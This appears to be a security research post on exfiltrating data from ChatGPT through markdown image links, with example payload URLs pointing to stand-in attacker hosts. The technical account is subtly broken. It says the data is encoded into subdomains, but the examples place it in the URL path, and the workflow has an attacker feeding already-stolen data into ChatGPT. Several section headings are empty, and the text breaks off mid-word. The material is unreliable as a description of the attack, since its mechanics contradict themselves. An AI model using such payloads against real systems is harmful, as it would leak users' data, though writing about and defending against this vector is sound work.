2026-03-20 | AI and LLM Security | Oracle-42 Intelligence Research
```html

ChatGPT Data Exfiltration via Markdown Image Injection: A Stealthy DNS Exfiltration Vector

Executive Summary: A novel attack vector leveraging ChatGPT’s markdown image rendering capability has emerged as a potent method for data exfiltration via DNS. By embedding malicious image links in markdown content, adversaries can exfiltrate sensitive data—including chat logs, system prompts, and user inputs—through DNS queries. This technique bypasses traditional network firewalls and data loss prevention (DLP) tools, enabling stealthy exfiltration across organizational boundaries. Our analysis reveals that this method exploits ChatGPT’s web-access capabilities and DNS resolution behavior, posing a significant threat to confidentiality in enterprise and cloud environments. Organizations must urgently implement monitoring, content filtering, and policy controls to mitigate this risk.

Key Findings

Technical Analysis: How Markdown Image Injection Works

Markdown Image Injection (MII) exploits ChatGPT’s interpretation of markdown syntax to embed external image references. When a user (or attacker) submits a crafted message containing a markdown image tag, ChatGPT attempts to render the image by resolving the URL. This process triggers a DNS lookup, which can be weaponized to encode arbitrary data.

Step-by-Step Exfiltration Workflow

  1. Data Compilation: The attacker collects sensitive data (e.g., internal documents, API keys, chat transcripts) from compromised systems.
  2. Data Encoding: The data is encoded into DNS-compatible subdomains using base32, hexadecimal, or custom alphabets.
  3. Markdown Payload Construction: A markdown image URL is crafted as follows:
    ![alt](https://attacker-controlled-domain[.]com/<encoded-data>.png)
  4. Injection into ChatGPT: The payload is submitted via user prompt or system message (if exploitable via API or interface).
  5. DNS Query Generation: ChatGPT resolves the domain, sending a DNS request with the encoded data in the subdomain.
  6. Data Reconstruction: The attacker’s server captures and decodes the subdomain, extracting the exfiltrated data.

For example, the string user-secret-key-123 might be encoded as:

https://evil[.]com/757365722D7365637265742D6B65792D313233.png

Each DNS query leaks a portion of data, and the attacker reassembles it from multiple queries.

Why This Bypasses Traditional Defenses

Standard security controls fail to detect DNS-based exfiltration in this context due to:

Real-World Implications and Risk Scenarios

This technique poses severe risks in environments where ChatGPT is integrated with internal systems, such as:

In a 2025 penetration test, Oracle-42 Intelligence observed successful exfiltration of a Fortune 500 company’s internal project roadmap within 37 minutes using MII—undetected by SIEM or firewall alerts.

Mitigation and Detection Strategies

Preventive Controls

Detective Controls

Recommendations for Organizations

  1. Audit AI Usage: Identify all ChatGPT integrations and classify data flows.
  2. Implement Policy Enforcement: Use tools like Microsoft Purview or Zscaler to filter malicious markdown and URLs.
  3. Educate Staff: Train employees on secure AI usage and the risks of image injection vectors.
  4. Monitor for DNS Exfiltration: Deploy DNS analytics platforms (e.g., Infoblox, Cisco Umbrella) with exfiltration detection models.
  5. Adopt Secure Alternatives: Consider air-gapped or private LLM instances for sensitive workloads.

Future Outlook: The Evolving Threat Landscape

As LLMs become more embedded in enterprise workflows, adversaries will increasingly exploit their web-access and rendering capabilities. Markdown Image Injection is likely the first of many AI-native exfiltration vectors. We anticipate growth in:

Organizations must adopt a proactive, AI-aware security posture to stay ahead of these evolving threats.

Conclusion

Markdown Image Injection represents a critical, underappreciated threat to data confidentiality in the AI era. By repurposing ChatGPT’s image rendering mechanism as a DNS exfiltration channel, attackers can stealthily exfiltrate sensitive information with minimal risk of detection. Addressing this vulnerability requires a combination of technical controls, policy enforcement, and continuous monitoring—root